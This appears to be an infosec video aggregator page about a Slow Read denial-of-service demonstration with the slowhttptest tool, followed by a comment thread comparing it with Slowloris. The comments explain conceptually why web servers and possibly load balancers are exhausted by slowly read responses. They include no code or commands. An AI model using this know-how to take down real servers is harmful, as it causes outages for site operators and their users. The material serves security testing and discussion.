Description: Demonstration of Slow Read DoS attack utilizing Persist Timer exploit.
Slowhttptest is a DoS simulator, that uses slowloris, slow post, slow read attacks to test if server is vulnerable.
http://code.google.com/p/slowhttptest/
Details: https://community.qualys.com/blogs/securitylabs/2012/01/05/slow-read
Tags: DoS , SlowRead , pentesting , slowloris , qualys ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
I don't see where is this different from Slow Loris?
Slow loris sends incomplete requests. Slow Read sends legitimate complete requests, but reads responses slowly. Huge difference in footprint, detection and mitigation approaches.
OK, so it reads the responses slowly - but if the server is not keeping the connection alive anyway?
I think, personally, I'll stick with Slow Loris - it's just so effective :-)
If server is not keeping connection alive - kernel of operating system would keep connection alive until it delivers the data. Check out http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4609, or google for Persist timer exploit.
Slowloris is detectable in request phase, slow read is not.
Slowloris is useless against IIS, slow read is as effective against IIS, as it is against Apache, nginx, lightpd, and so on. Anyway, slowhttptest implements very configurable slowloris and slow POST as well.
I would appreciate any suggestions and comments.
I agree that Slow Loris is not 100% effective with IIS, but it's not really a server I would target with that kind of attack.
Regarding the Kernel buffering the data, I'm not convinced that it would do so in the context of usefulness to a DoS attack, or that you'd bring it to its knees. Have you tried it in such circumstances - as I'd be interested in the results.
It would also be interesting to see how it copes with load balanced sites. I guess if you could take the balancer down, it's game over for the real servers behind it.
The whole range of 'slow' attacks against HTTP servers are interesting and largely unmitigated.
Web servers architecture assumes (by design of TCP) that if data can't fit into kernel buffer - application should take care of it, e.g. keep polling the socket for write readiness. MOST web servers are not distinguish between active socket, and socket that USED to be active (but is inactive now because kernel didn't send the data because peer is not ready), thus they keep that used-to-be-active socket in concurrent connections pool. The only exception is Apache MPM Event, which has separate thread to poll socketfor readiness, but has other issues. So the only problem is to find a resource that doesn't fit into server's send buffer. Most of configurations rely on OS settings to control send buffer size, which is between 64K and 128K, and it's easy to find a resource (or play with HTTP pipelining) to meet the prerequisite.
Answering your question, in theory I don't see why any web server wouldn't be vulnerable, unless it limits the duration of the connection no matter it's in read state (slowloris) or write state (slow read). But I don't have any statistical data yet.
Load balancing is a good point to mention. I don't know how load balancers are implemented, but something like reverse proxy should be also vulnerable, in theory. If you have a server setup with load balancer, we can try playing with it.